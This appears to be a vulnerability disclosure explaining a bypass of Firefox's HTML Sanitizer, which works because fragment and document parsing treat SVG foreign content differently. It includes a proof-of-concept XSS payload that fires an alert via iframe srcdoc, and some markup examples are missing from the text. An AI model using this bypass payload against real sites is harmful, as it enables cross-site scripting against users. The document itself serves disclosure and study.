I've found a bug in Firefox sanitizer that can be exploited if the result of
sanitizeToString is used in a sink that doesn't parse the HTML using fragment parsing algorithm (examples being:
Proof of concept
Here's the proof-of-concept:
const bypass = `<svg><font color><title><u rel="</title><img src onerror=alert(document.domain)>">`;
ifr.srcdoc = new Sanitizer().sanitizeToString(bypass);
Make sure to test on Firefox Nightly. An
alert is shown despite using the sanitizer.
There's an interesting difference in HTML parsing in HTML spec between fragment parsing algorithm and document parsing algorithm in foreign content.
Suppose we have the following markup:
If we use document parsing algorithm (via
srcdoc for instance), it creates the following DOM tree:
├ <svg svg>
└ <html p>
(I'm using a notation that tag name is prepended with a namespace name)
On the other hand, if we use fragment parsing algorithm (via
innerHTML), it creates the following DOM tree:
└ <svg svg>
└ <svg p>
This is correct per HTML spec and rules of parsing tokens in foreign content (however, interestingly, Chrome parses both cases the same way).
According to the specification, if the parses is in document parsing mode, then certain tokens (
<p> included) "escape" the foreign content. The same doesn't happen in fragment parsing.
Another interesting tag that "escapes" foreign content is
<font> because it does so only if it has any attributes named
So in document parsing mode the markup
svg font, while
<svg><font face> creates
Now consider the following markup (that was the bypass):
<img src onerror=alert(document.domain)>">
Internally, Firefox sanitizer makes use of fragment parsing algorithm. This means that the markup is parsed into the following DOM tree:
└ <svg svg>
└ <svg font color="">
└ <svg title>
└ <html u rel="</title><img src onerror=alert(1)>">
All of these elements and attributes are allow-listed by the sanitizer. When authors use
sanitizeToString, the markup is serialized to:
<img src onerror=alert(document.domain)>"></u></title></font></svg>
Now, when this result is assigned to
srcdoc (or other places with document parsing mode), it is parsed into the following DOM tree:
├ <svg svg>
└ <html font color="">
├ <html title>
│ └ #text: <u rel="
├ <html img src="" onerror="alert(document.domain)"/>
└ #text: ">
So because of the difference in parsing between document and fragment,
<font color> "escaped" foreign content and thus
title is now parsed in HTML namespace, not in SVG namespace, which means that it is closed on first instance of
</title> leading to the bypass.